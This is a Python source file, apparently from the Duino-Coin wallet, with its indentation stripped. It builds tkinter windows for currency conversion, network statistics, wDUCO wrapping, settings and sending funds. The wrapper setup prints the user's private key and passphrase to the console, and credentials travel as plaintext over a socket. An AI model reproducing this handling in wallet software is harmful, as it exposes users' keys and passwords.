def currency_converter_window(handler):
global conversionresulttext
global fromCurrencyInput
global toCurrencyInput
global amountInput
global calculatorWindow
calculatorWindow = Toplevel()
calculatorWindow.resizable(False, False)
calculatorWindow.title(get_string("wallet_calculator"))
calculatorWindow.transient([root])
calculatorWindow.configure(background=BACKGROUND_COLOR)
TEXT_FONT_BOLD = Font(
calculatorWindow,
size=12,
weight="bold")
TEXT_FONT_BOLD_LARGE = Font(
calculatorWindow,
size=14,
weight="bold")
TEXT_FONT = Font(
calculatorWindow,
size=12,
weight="normal")
Label(
calculatorWindow,
text=get_string("currency_converter"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(row=0,
columnspan=2,
column=0,
sticky=S + W,
pady=5,
padx=5)
Label(
calculatorWindow,
text=get_string("from"),
font=TEXT_FONT_BOLD,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(row=1,
column=0,
sticky=S + W,
padx=5)
fromCurrencyInput = Listbox(
calculatorWindow,
exportselection=False,
background=BACKGROUND_COLOR,
selectbackground=FOREGROUND_COLOR,
border="0",
font=TEXT_FONT,
foreground=FONT_COLOR,
width="20",
height="13",
)
fromCurrencyInput.grid(row=2,
column=0,
sticky=S + W,
padx=(5, 0))
fromCurrencyInput.insert(0, "DUCO")
vsb = Scrollbar(
calculatorWindow,
orient="vertical",
command=fromCurrencyInput.yview,
background=BACKGROUND_COLOR,
)
vsb.grid(row=2,
column=1,
sticky="ns",
padx=(0, 5))
fromCurrencyInput.configure(yscrollcommand=vsb.set)
fromCurrencyInput.select_set(0)
fromCurrencyInput.event_generate("<<ListboxSelect>>")
Label(
calculatorWindow,
text=get_string("to"),
font=TEXT_FONT_BOLD,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(row=1,
column=3,
columnspan=2,
sticky=S + W,
padx=5)
toCurrencyInput = Listbox(
calculatorWindow,
exportselection=False,
background=BACKGROUND_COLOR,
selectbackground=FOREGROUND_COLOR,
border="0",
foreground=FONT_COLOR,
font=TEXT_FONT,
width="20",
height="13")
toCurrencyInput.grid(
row=2,
column=3,
sticky=S + W,
padx=(5, 0))
toCurrencyInput.insert(0, "USD")
vsb2 = Scrollbar(
calculatorWindow,
orient="vertical",
command=toCurrencyInput.yview,
background=BACKGROUND_COLOR,)
vsb2.grid(
row=2,
column=4,
sticky="ns",
padx=(0, 5))
toCurrencyInput.configure(yscrollcommand=vsb2.set)
toCurrencyInput.select_set(0)
toCurrencyInput.event_generate("<<ListboxSelect>>")
Label(
calculatorWindow,
text=get_string("input_amount"),
font=TEXT_FONT_BOLD,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(row=3,
columnspan=2,
column=0,
sticky=S + W,
padx=5)
def clear_ccamount_placeholder(self):
amountInput.delete("0", "100")
amountInput = Entry(
calculatorWindow,
foreground=FOREGROUND_COLOR_SECONDARY,
border="0",
font=TEXT_FONT,
background=BACKGROUND_COLOR,)
amountInput.grid(
row=4,
column=0,
sticky=N + S + W + E,
padx=5,
columnspan=2,
pady=(0, 5))
amountInput.insert("0", str(global_balance))
amountInput.bind("<FocusIn>", clear_ccamount_placeholder)
Button(
calculatorWindow,
text=get_string("calculate"),
font=TEXT_FONT_BOLD,
foreground=FOREGROUND_COLOR,
activebackground=BACKGROUND_COLOR,
background=BACKGROUND_COLOR,
command=currency_converter_calc,
).grid(row=3,
columnspan=2,
column=2,
sticky=N + S + W + E,
pady=(5, 0),
padx=5)
conversionresulttext = StringVar(calculatorWindow)
conversionresulttext.set(get_string("result") + ": 0.0")
conversionresultLabel = Label(
calculatorWindow,
textvariable=conversionresulttext,
font=TEXT_FONT_BOLD,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,)
conversionresultLabel.grid(
row=4,
columnspan=2,
column=2,
pady=(0, 5))
calculatorWindow.mainloop()
def statistics_window(handler):
statsApi = get(
"https://raw.githubusercontent.com/"
+ "revoxhere/"
+ "duco-statistics/master/"
+ "api.json",
data=None)
if statsApi.status_code == 200: # Check for reponse
statsApi = statsApi.json()
statsWindow = Toplevel()
statsWindow.resizable(False, False)
statsWindow.title(get_string("statistics_title"))
statsWindow.transient([root])
statsWindow.configure(background=BACKGROUND_COLOR)
TEXT_FONT_BOLD_LARGE = Font(
statsWindow,
size=14,
weight="bold")
TEXT_FONT = Font(
statsWindow,
size=12,
weight="normal")
Active_workers_listbox = Listbox(
statsWindow,
exportselection=False,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
border="0",
font=TEXT_FONT,
width="65",
height="8",)
Active_workers_listbox.grid(
row=1,
columnspan=2,
sticky=N + E + S + W,
pady=(0, 5),
padx=5)
i = 0
totalHashrate = 0
for threadid in statsApi["Miners"]:
if username in statsApi["Miners"][threadid]["User"]:
rigId = statsApi["Miners"][threadid]["Identifier"]
if rigId == "None":
rigId = ""
else:
rigId += ": "
software = statsApi["Miners"][threadid]["Software"]
hashrate = str(round(statsApi["Miners"][threadid]["Hashrate"], 2))
totalHashrate += float(hashrate)
difficulty = str(statsApi["Miners"][threadid]["Diff"])
shares = (
str(statsApi["Miners"][threadid]["Accepted"])
+ "/"
+ str(
statsApi["Miners"][threadid]["Accepted"]
+ statsApi["Miners"][threadid]["Rejected"]))
Active_workers_listbox.insert(
i,
"#"
+ str(i + 1)
+ ": "
+ rigId
+ software
+ " "
+ str(round(float(hashrate) / 1000, 2))
+ " kH/s @ diff "
+ difficulty
+ ", "
+ shares)
i += 1
if i == 0:
Active_workers_listbox.insert(
i, get_string("statistics_miner_warning"))
totalHashrateString = str(int(totalHashrate)) + " H/s"
if totalHashrate > 1000000000:
totalHashrateString = str(
round(totalHashrate / 1000000000, 2)) + " GH/s"
elif totalHashrate > 1000000:
totalHashrateString = str(round(totalHashrate / 1000000, 2)) + " MH/s"
elif totalHashrate > 1000:
totalHashrateString = str(round(totalHashrate / 1000, 2)) + " kH/s"
Active_workers_listbox.configure(height=i)
Active_workers_listbox.select_set(32)
Active_workers_listbox.event_generate("<<ListboxSelect>>")
Label(
statsWindow,
text=get_string("your_miners") + " - " + totalHashrateString,
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(
row=0,
column=0,
columnspan=2,
sticky=S + W,
pady=5,
padx=5)
Label(
statsWindow,
text=get_string("richlist"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(
row=2,
column=0,
sticky=S + W,
pady=5,
padx=5)
Top_10_listbox = Listbox(
statsWindow,
exportselection=False,
border="0",
font=TEXT_FONT,
width="30",
height="10",
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
Top_10_listbox.grid(
row=3,
column=0,
rowspan=10,
sticky=N + E + S + W,
pady=(0, 5),
padx=5)
for i in statsApi["Top 10 richest miners"]:
Top_10_listbox.insert(i, statsApi["Top 10 richest miners"][i])
Top_10_listbox.select_set(32)
Top_10_listbox.event_generate("<<ListboxSelect>>")
Label(
statsWindow,
text=get_string("network_info"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(row=2,
column=1,
sticky=S + W,
padx=5,
pady=5)
Label(
statsWindow,
text=get_string("difficulty")
+ ": "
+ str(statsApi["Current difficulty"]),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=3,
column=1,
sticky=S + W,
padx=5)
Label(
statsWindow,
text=get_string("mined_blocks")
+ ": "
+ str(statsApi["Mined blocks"]),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=4,
column=1,
sticky=S + W,
padx=5)
Label(
statsWindow,
text=get_string("network_hashrate")
+ ": "
+ str(statsApi["Pool hashrate"]),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=5,
column=1,
sticky=S + W,
padx=5)
Label(
statsWindow,
text=get_string("active_miners")
+ ": "
+ str(len(statsApi["Miners"])),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=6,
column=1,
sticky=S + W,
padx=5)
Label(
statsWindow,
text="1 DUCO "
+ get_string("estimated_price")
+ ": $"
+ str(statsApi["Duco price"]),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=7,
column=1,
sticky=S + W,
padx=5)
Label(
statsWindow,
text=get_string("registered_users")
+ ": "
+ str(statsApi["Registered users"]),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=8,
column=1,
sticky=S + W,
padx=5)
Label(
statsWindow,
text=get_string("mined_duco")
+ ": "
+ str(statsApi["All-time mined DUCO"])
+ " ᕲ",
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=9,
column=1,
sticky=S + W,
padx=5)
statsWindow.mainloop()
def wrapper_window(handler):
def Wrap():
amount = amountWrap.get()
print("Got amount: ", amount)
soc = socket()
soc.connect((pool_address, int(pool_port)))
soc.recv(3)
try:
float(amount)
except Exception:
pass
else:
soc.send(bytes(
"LOGI,"
+ str(username)
+ ","
+ str(password),
encoding="utf8"))
_ = soc.recv(10)
soc.send(
bytes(
"WRAP,"
+ str(amount)
+ ","
+ str(pub_key),
encoding="utf8"))
soc.close()
sleep(2)
wrapperWindow.quit()
try:
pubkeyfile = open(str(resources + "DUCOPubKey.pub"), "r")
except Exception:
messagebox.showerror(
title=get_string("wrapper_error_title"),
message=get_string("wrapper_error"))
else:
if TRONPY_ENABLED:
pub_key = pubkeyfile.read()
pubkeyfile.close()
wrapperWindow = Toplevel()
wrapperWindow.resizable(False, False)
wrapperWindow.title(get_string("wrapper_title"))
wrapperWindow.transient([root])
askWrapAmount = Label(
wrapperWindow,
text=get_string("wrapper_amount_to_wrap") + ":")
askWrapAmount.grid(row=0,
column=0,
sticky=N + W)
amountWrap = Entry(wrapperWindow,
border="0",
font=Font(size=15))
amountWrap.grid(row=1,
column=0,
sticky=N + W)
wrapButton = Button(wrapperWindow,
text="Wrap",
command=Wrap)
wrapButton.grid(row=2,
column=0,
sticky=N + W)
else:
messagebox.showerror(
title=get_string("wrapper_error_title"),
message=get_string("wrapper_error_tronpy"))
def unwrapper_window(handler):
def UnWrap():
pubkeyfile = open(str(resources + "DUCOPubKey.pub"), "r")
pub_key = pubkeyfile.read()
pubkeyfile.close()
passphrase = passphraseEntry.get()
privkeyfile = open(str(resources + "DUCOPrivKey.encrypt"), "r")
privKeyEnc = privkeyfile.read()
privkeyfile.close()
try:
priv_key = str(password_decrypt(privKeyEnc, passphrase))[2:66]
use_wrapper = True
except InvalidToken:
print(get_string("invalid_passphrase"))
use_wrapper = False
amount = amountUnWrap.get()
print("Got amount:", amount)
soc = socket()
soc.connect((pool_address, int(pool_port)))
soc.recv(3)
try:
float(amount)
except Exception:
pass
else:
soc.send(bytes(
"LOGI,"
+ str(username)
+ ","
+ str(password), encoding="utf8"))
_ = soc.recv(10)
if use_wrapper:
pendingvalues = wduco.functions.pendingWithdrawals(
pub_key, username)
# transaction wasn't initiated, but variable should be declared
txn_success = False
try:
amount = float(amount)
except ValueError:
print("Value should be numeric - aborting")
else:
if int(float(amount) * 10 ** 6) >= pendingvalues:
toInit = int(float(amount) * 10 ** 6) - pendingvalues
else:
toInit = amount * 10 ** 6
if toInit > 0:
txn = (
wduco.functions.initiateWithdraw(username, toInit)
.with_owner(pub_key)
.fee_limit(5_000_000)
.build()
.sign(PrivateKey(bytes.fromhex(priv_key))))
txn = txn.broadcast()
txnfeedback = txn.result()
if txnfeedback:
txn_success = True
else:
txn_success = False
if txn_success or amount <= pendingvalues:
soc.send(
bytes(
"UNWRAP,"
+ str(amount)
+ ","
+ str(pub_key),
encoding="utf8"))
soc.close()
sleep(2)
unWrapperWindow.quit()
try:
pubkeyfile = open(str(resources + "DUCOPubKey.pub"), "r")
pubkeyfile.read()
pubkeyfile.close()
except Exception:
messagebox.showerror(
title=get_string("wrapper_error_title"),
message=get_string("wrapper_error"))
else:
if TRONPY_ENABLED:
unWrapperWindow = Toplevel()
unWrapperWindow.resizable(False, False)
unWrapperWindow.title(get_string("unwrapper_title"))
unWrapperWindow.transient([root])
unWrapperWindow.configure()
askAmount = Label(
unWrapperWindow,
text=get_string("unwrap_amount"))
askAmount.grid(row=1,
column=0,
sticky=N + W)
amountUnWrap = Entry(
unWrapperWindow,
border="0",
font=Font(size=15))
amountUnWrap.grid(row=2,
column=0,
sticky=N + W)
askPassphrase = Label(
unWrapperWindow,
text=get_string("ask_passphrase"))
askPassphrase.grid(row=4,
column=0,
sticky=N + W)
passphraseEntry = Entry(
unWrapperWindow,
border="0",
font=Font(size=15))
passphraseEntry.grid(
row=5,
column=0,
sticky=N + W)
wrapButton = Button(
unWrapperWindow,
text=get_string("unwrap_duco"),
command=UnWrap)
wrapButton.grid(
row=7,
column=0,
sticky=N + W)
else:
messagebox.showerror(
title=get_string("wrapper_error"),
message=get_string("wrapper_error_tronpy"))
def settings_window(handler):
def _wrapperconf():
if TRONPY_ENABLED:
privkey_input = StringVar()
passphrase_input = StringVar()
wrapconfWindow = Toplevel()
wrapconfWindow.resizable(False, False)
wrapconfWindow.title(get_string("wrapper_title"))
wrapconfWindow.transient([root])
wrapconfWindow.configure()
def setwrapper():
if privkey_input and passphrase_input:
priv_key = privkey_entry.get()
print("Got priv key:", priv_key)
passphrase = passphrase_entry.get()
print("Got passphrase:", passphrase)
try:
pub_key = PrivateKey(
bytes.fromhex(priv_key)
).public_key.to_base58check_address()
except Exception:
pass
else:
print("Saving data")
privkeyfile = open(
str(resources + "DUCOPrivKey.encrypt"), "w")
privkeyfile.write(
str(password_encrypt(
priv_key.encode(), passphrase
).decode()))
privkeyfile.close()
pubkeyfile = open(
str(resources + "DUCOPubKey.pub"), "w")
pubkeyfile.write(pub_key)
pubkeyfile.close()
Label(wrapconfWindow, text=get_string(
"wrapper_success")).pack()
wrapconfWindow.quit()
title = Label(
wrapconfWindow,
text=get_string("wrapper_config_title"),
font=Font(size=20))
title.grid(row=0,
column=0,
sticky=N + W,
padx=5)
askprivkey = Label(
wrapconfWindow,
text=get_string("ask_private_key"))
askprivkey.grid(row=1,
column=0,
sticky=N + W)
privkey_entry = Entry(
wrapconfWindow,
font=TEXT_FONT,
textvariable=privkey_input)
privkey_entry.grid(row=2,
column=0,
sticky=N + W)
askpassphrase = Label(wrapconfWindow,
text=get_string("passphrase"))
askpassphrase.grid(row=3,
column=0,
sticky=N + W)
passphrase_entry = Entry(
wrapconfWindow,
font=TEXT_FONT,
textvariable=passphrase_input)
passphrase_entry.grid(row=4,
column=0,
sticky=N + W)
wrapConfigButton = Button(
wrapconfWindow,
text=get_string("configure_wrapper_lowercase"),
command=setwrapper)
wrapConfigButton.grid(row=5,
column=0,
sticky=N + W)
wrapconfWindow.mainloop()
else:
messagebox.showerror(
title=get_string("wrapper_error"),
message=get_string("wrapper_error_tronpy"))
def _logout():
try:
with sqlconn(resources + "wallet.db") as con:
cur = con.cursor()
cur.execute("DELETE FROM UserData")
con.commit()
except Exception as e:
print(e)
try:
execl(sys.executable, sys.executable, *sys.argv)
except Exception as e:
print(e)
def _cleartrs():
with sqlconn(resources + "wallet.db") as con:
cur = con.cursor()
cur.execute("DELETE FROM transactions")
con.commit()
def _chgpass():
def _changepassprotocol():
oldpasswordS = oldpassword.get()
newpasswordS = newpassword.get()
confpasswordS = confpassword.get()
if oldpasswordS != newpasswordS:
if oldpasswordS and newpasswordS and confpasswordS:
if newpasswordS == confpasswordS:
soc = socket()
soc.connect((pool_address, int(pool_port)))
soc.recv(3)
soc.send(
bytes(
"LOGI,"
+ str(username)
+ ","
+ str(password), encoding="utf8"))
soc.recv(2)
soc.send(
bytes(
"CHGP,"
+ str(oldpasswordS)
+ ","
+ str(newpasswordS),
encoding="utf8"))
response = soc.recv(128).decode(
"utf8").rstrip("\n").split(",")
soc.close()
if not "OK" in response[0]:
messagebox.showerror(
title=get_string("change_passwd_error"),
message=response[1])
else:
messagebox.showinfo(
title=get_string("change_passwd_ok"),
message=response[1])
try:
try:
with sqlconn(
resources + "wallet.db"
) as con:
cur = con.cursor()
cur.execute("DELETE FROM UserData")
con.commit()
except Exception as e:
print(e)
except FileNotFoundError:
pass
execl(sys.executable, sys.executable, *sys.argv)
else:
messagebox.showerror(
title=get_string("change_passwd_error"),
message=get_string("error_passwd_dont_match"))
else:
messagebox.showerror(
title=get_string("change_passwd_error"),
message=get_string("fill_the_blanks_warning"))
else:
messagebox.showerror(
title=get_string("change_passwd_error"),
message=get_string("same_passwd_error"))
settingsWindow.destroy()
changepassWindow = Toplevel()
changepassWindow.title(get_string("change_passwd_lowercase"))
changepassWindow.resizable(False, False)
changepassWindow.transient([root])
changepassWindow.configure(background=BACKGROUND_COLOR)
TEXT_FONT_BOLD = Font(changepassWindow, size=12, weight="bold")
TEXT_FONT = Font(changepassWindow, size=12, weight="normal")
Label(
changepassWindow,
text=get_string("old_passwd"),
font=TEXT_FONT_BOLD,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=0,
sticky=W,
padx=5)
oldpassword = Entry(
changepassWindow,
show="*",
font=TEXT_FONT,
foreground=FOREGROUND_COLOR_SECONDARY,
background=BACKGROUND_COLOR)
oldpassword.grid(row=1,
sticky="nswe",
padx=5)
Label(
changepassWindow,
text=get_string("new_passwd"),
font=TEXT_FONT_BOLD,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=2,
sticky=W,
padx=5)
newpassword = Entry(
changepassWindow,
show="*",
font=TEXT_FONT,
foreground=FOREGROUND_COLOR_SECONDARY,
background=BACKGROUND_COLOR)
newpassword.grid(row=3,
sticky="nswe",
padx=5)
Label(
changepassWindow,
text=get_string("confirm_new_passwd"),
font=TEXT_FONT_BOLD,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(row=4,
sticky=W,
padx=5)
confpassword = Entry(
changepassWindow,
show="*",
font=TEXT_FONT,
foreground=FOREGROUND_COLOR_SECONDARY,
background=BACKGROUND_COLOR)
confpassword.grid(row=5,
sticky="nswe",
padx=5)
chgpbtn = Button(
changepassWindow,
text=get_string("change_passwd"),
command=_changepassprotocol,
foreground=FOREGROUND_COLOR,
font=TEXT_FONT_BOLD,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR)
chgpbtn.grid(columnspan=2,
sticky="nswe",
pady=5,
padx=5)
settingsWindow = Toplevel()
settingsWindow.resizable(False, False)
settingsWindow.title(get_string("settings_title"))
settingsWindow.transient([root])
settingsWindow.configure(background=BACKGROUND_COLOR)
TEXT_FONT = Font(
settingsWindow,
size=12,
weight="normal")
TEXT_FONT_BOLD_LARGE = Font(
settingsWindow,
size=12,
weight="bold")
Label(
settingsWindow,
text=get_string("uppercase_settings"),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(row=0,
column=0,
columnspan=4,
sticky=S + W,
pady=(5, 5),
padx=(5, 0))
logoutbtn = Button(
settingsWindow,
text=get_string("logout"),
command=_logout,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR,
foreground=FONT_COLOR)
logoutbtn.grid(row=1,
column=0,
columnspan=4,
sticky="nswe",
padx=5)
chgpassbtn = Button(
settingsWindow,
text=get_string("change_passwd"),
command=_chgpass,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR,
foreground=FONT_COLOR)
chgpassbtn.grid(row=2,
column=0,
columnspan=4,
sticky="nswe",
padx=5)
wrapperconfbtn = Button(
settingsWindow,
text=get_string("configure_wrapper"),
command=_wrapperconf,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR,
foreground=FONT_COLOR)
wrapperconfbtn.grid(row=3,
column=0,
columnspan=4,
sticky="nswe",
padx=5)
cleartransbtn = Button(
settingsWindow,
text=get_string("clear_transactions"),
command=_cleartrs,
font=TEXT_FONT,
background=BACKGROUND_COLOR,
activebackground=BACKGROUND_COLOR,
foreground=FONT_COLOR)
cleartransbtn.grid(row=4,
column=0,
columnspan=4,
sticky="nswe",
padx=5)
separator = ttk.Separator(settingsWindow, orient="horizontal")
separator.grid(
row=5,
column=0,
columnspan=4,
sticky=N + S + E + W,
padx=(5, 5),
pady=5)
Label(
settingsWindow,
text=get_string("logged_in_as")
+ ": "
+ str(username),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(
row=6,
column=0,
columnspan=4,
padx=5,
sticky=S + W)
Label(
settingsWindow,
text=get_string("wallet_version")
+ ": "
+ str(VERSION),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(
row=7,
column=0,
columnspan=4,
padx=5,
sticky=S + W)
Label(
settingsWindow,
text=get_string("translation_author_message")
+ " "
+ get_string("translation_author"),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(
row=8,
column=0,
columnspan=4,
padx=5,
sticky=S + W)
Label(
settingsWindow,
text=get_string("config_dev_warning"),
font=TEXT_FONT,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR,
).grid(
row=9,
column=0,
columnspan=4,
padx=5,
sticky=S + W)
separator = ttk.Separator(settingsWindow, orient="horizontal")
separator.grid(
row=10,
column=0,
columnspan=4,
sticky=N + S + E + W,
padx=(5, 5),
pady=5)
original = Image.open(resources + "duco.png")
resized = original.resize((48, 48), Image.ANTIALIAS)
website = ImageTk.PhotoImage(resized)
website.image = website
websiteLabel = Label(
settingsWindow,
image=website,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
websiteLabel.grid(
row=11,
column=0,
sticky=N + S + E + W,
padx=(5, 0),
pady=(0, 5))
websiteLabel.bind("<Button-1>", openWebsite)
original = Image.open(resources + "github.png")
resized = original.resize((48, 48), Image.ANTIALIAS)
github = ImageTk.PhotoImage(resized)
github.image = github
githubLabel = Label(
settingsWindow,
image=github,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
githubLabel.grid(
row=11,
column=1,
sticky=N + S + E + W,
pady=(0, 5))
githubLabel.bind("<Button-1>", openGitHub)
original = Image.open(resources + "exchange.png")
resized = original.resize((48, 48), Image.ANTIALIAS)
exchange = ImageTk.PhotoImage(resized)
exchange.image = exchange
exchangeLabel = Label(
settingsWindow,
image=exchange,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
exchangeLabel.grid(
row=11,
column=2,
sticky=N + S + E + W,
pady=(0, 5))
exchangeLabel.bind("<Button-1>", openExchange)
original = Image.open(resources + "discord.png")
resized = original.resize((48, 48), Image.ANTIALIAS)
discord = ImageTk.PhotoImage(resized)
discord.image = discord
discordLabel = Label(
settingsWindow,
image=discord,
background=BACKGROUND_COLOR,
foreground=FONT_COLOR)
discordLabel.grid(
row=11,
column=3,
sticky=N + S + E + W,
padx=(0, 5),
pady=(0, 5))
discordLabel.bind("<Button-1>", openDiscord)
def get_balance():
global oldbalance
global balance
global unpaid_balance
global global_balance
global gtxl
try:
soc = socket()
soc.connect((pool_address, int(pool_port)))
soc.recv(3)
soc.send(bytes(
"LOGI,"
+ str(username)
+ ","
+ str(password), encoding="utf8"))
_ = soc.recv(2)
soc.send(bytes(
"BALA",
encoding="utf8"))
oldbalance = balance
balance = float(soc.recv(64).decode().rstrip("\n"))
global_balance = round(float(balance), 8)
try:
gtxl = {}
soc.send(bytes(
"GTXL," + str(username) + ",7",
encoding="utf8"))
gtxl = str(soc.recv(8096).decode().rstrip(
"\n").replace("\'", "\""))
gtxl = jsonloads(gtxl)
except Exception as e:
print("Error getting transaction list: " + str(e))
if oldbalance != balance:
difference = float(balance) - float(oldbalance)
dif_with_unpaid = (
float(balance) - float(oldbalance)) + unpaid_balance
if float(balance) != float(difference):
if (dif_with_unpaid >= MIN_TRANSACTION_VALUE
or dif_with_unpaid < 0
):
now = datetime.now()
difference = round(dif_with_unpaid, 8)
if (
difference >= MIN_TRANSACTION_VALUE_NOTIFY
or difference < 0
and notificationsEnabled
):
notification = Notify()
notification.title = get_string("duino_coin_wallet")
notification.message = (
get_string("notification_new_transaction")
+ "\n"
+ now.strftime("%d.%m.%Y %H:%M:%S\n")
+ str(round(difference, 6))
+ " DUCO")
notification.icon = resources + "duco_color.png"
notification.send(block=False)
with sqlconn(resources + "wallet.db") as con:
cur = con.cursor()
cur.execute(
"""INSERT INTO Transactions(Date, amount)
VALUES(?, ?)""", (
now.strftime("%d.%m.%Y %H:%M:%S"),
round(difference, 8)))
con.commit()
unpaid_balance = 0
else:
unpaid_balance += float(balance) - float(oldbalance)
except Exception as e:
print("Retrying in 3s. (" + str(e) + ")")
Timer(3, get_balance).start()
def get_wbalance():
if TRONPY_ENABLED:
try:
pubkeyfile = open(str(resources + "DUCOPubKey.pub"), "r")
pub_key = pubkeyfile.read()
pubkeyfile.close()
wBalance = float(wduco.functions.balanceOf(pub_key)) / (10 ** 6)
return wBalance
except Exception:
return 0.0
else:
return 0.0
def update_balance_labels():
global profit_array, profitCheck
try:
balancetext.set(str(round(global_balance, 7)) + " ᕲ")
wbalancetext.set(str(get_wbalance()) + " wᕲ")
balanceusdtext.set(
"$" + str(round(global_balance * duco_fiat_value, 4)))
with sqlconn(resources + "wallet.db") as con:
cur = con.cursor()
cur.execute("SELECT rowid,* FROM Transactions ORDER BY rowid DESC")
Transactions = cur.fetchall()
transactionstext_format = ""
for i, row in enumerate(Transactions, start=1):
transactionstext_format += str(row[1]) + " " + str(row[2]) + " DUCO\n"
if i == 6:
transactionstext_format = transactionstext_format.rstrip("\n")
break
transactionstext.set(transactionstext_format)
if profit_array[2] != 0:
sessionprofittext.set(
get_string("session") + ": "
+ str(profit_array[0]) + " ᕲ")
minuteprofittext.set(
"≈" + str(profit_array[1]) + " ᕲ/"
+ get_string("minute"))
hourlyprofittext.set(
"≈" + str(profit_array[2]) + " ᕲ/"
+ get_string("hour"))
dailyprofittext.set(
"≈"
+ str(profit_array[3])
+ " ᕲ/"
+ get_string("day")
+ " ($"
+ str(round(profit_array[3] * duco_fiat_value, 4))
+ ")")
else:
if profitCheck > 10:
sessionprofittext.set(get_string("sessionprofit_unavailable1"))
minuteprofittext.set(get_string("sessionprofit_unavailable2"))
hourlyprofittext.set("")
dailyprofittext.set("")
profitCheck += 1
except Exception:
_exit(0)
Timer(1, update_balance_labels).start()
def profit_calculator(start_bal):
try: # Thanks Bilaboz for the code!
global curr_bal, profit_array
prev_bal = curr_bal
curr_bal = global_balance
session = curr_bal - start_bal
tensec = curr_bal - prev_bal
minute = tensec * 6
hourly = minute * 60
daily = hourly * 24
if tensec >= 0:
profit_array = [
round(session, 8),
round(minute, 6),
round(hourly, 4),
round(daily, 2)]
except Exception:
_exit(0)
Timer(10, profit_calculator, [start_bal]).start()
def send_funds_protocol(handler):
recipientStr = recipient.get()
amountStr = amount.get()
MsgBox = messagebox.askquestion(
get_string("warning"),
get_string("send_funds_warning")
+ str(amountStr)
+ " DUCO "
+ get_string("send_funds_to")
+ " "
+ str(recipientStr),
icon="warning",)
if MsgBox == "yes":
soc = socket()
soc.connect((pool_address, int(pool_port)))
soc.recv(3)
soc.send(bytes(
"LOGI,"
+ str(username)
+ ","
+ str(password),
encoding="utf8"))
response = soc.recv(2)
soc.send(
bytes(
"SEND,"
+ "-"
+ ","
+ str(recipientStr)
+ ","
+ str(amountStr),
encoding="utf8"))
response = soc.recv(128).decode().rstrip("\n").split(",")
soc.close()
if "OK" in str(response[0]):
MsgBox = messagebox.showinfo(response[0],
response[1]
+ "\nTXID:"
+ response[2])
else:
MsgBox = messagebox.showwarning(response[0], response[1])
root.update()
def init_rich_presence():
global RPC
try:
RPC = Presence(806985845320056884)
RPC.connect()
except Exception: # Discord not launched
pass
def update_rich_presence():
startTime = int(time())
while True:
try:
balance = round(global_balance, 4)
RPC.update(
details=str(balance)
+ " ᕲ ($"
+ str(round(duco_fiat_value * balance, 2))
+ ")",
start=startTime,
large_image="duco",
large_text="Duino-Coin, "
+ "a coin that can be mined with almost everything, "
+ "including AVR boards",
buttons=[
{"label": "Learn more",
"url": "https://duinocoin.com"},
{"label": "Discord Server",
"url": "https://discord.gg/k48Ht5y"}])
except Exception: # Discord not launched
pass
sleep(15)
class Wallet:
def __init__(self, master):
global recipient
global amount
global balancetext
global wbalancetext
global sessionprofittext
global minuteprofittext
global hourlyprofittext
global dailyprofittext
global balanceusdtext
global transactionstext
global curr_bal
global profit_array
try:
loading.destroy()
except Exception:
pass
textFont4 = Font(
size=14,
weight="bold")
TEXT_FONT_BOLD_LARGE = Font(
size=12,
weight="bold")
TEXT_FONT_BOLD = Font(
size=18,
weight="bold")
TEXT_FONT = Font(
size=12,
weight="normal")
self.master = master
master.resizable(False, False)
master.configure(background=BACKGROUND_COLOR)
master.title(get_string("duino_coin_wallet"))
Label(
master,
text=get_string("uppercase_duino_coin_wallet")
+ ": "
+ str(username),
font=TEXT_FONT_BOLD_LARGE,
foreground=FOREGROUND_COLOR,
background=BACKGROUND_COLOR,
).grid(
row=0,
column=0,
sticky=S + W,
columnspan=4,
pady=(5, 0),
padx=(5, 0))
balancetext = StringVar()
wbalancetext = StringVar()
balancetext.set(get_string("please_wait"))
if TRONPY_ENABLED:
wbalancetext.set(get_string("please_wait"))
else:
wbalancetext.set("0.00")
balanceLabel = Label(
master,
textvariable=balancetext,
font=TEXT_FONT_BOLD,
foreground=FOREGROUND_COLOR_SECONDARY,
background=BACKGROUND_COLOR)
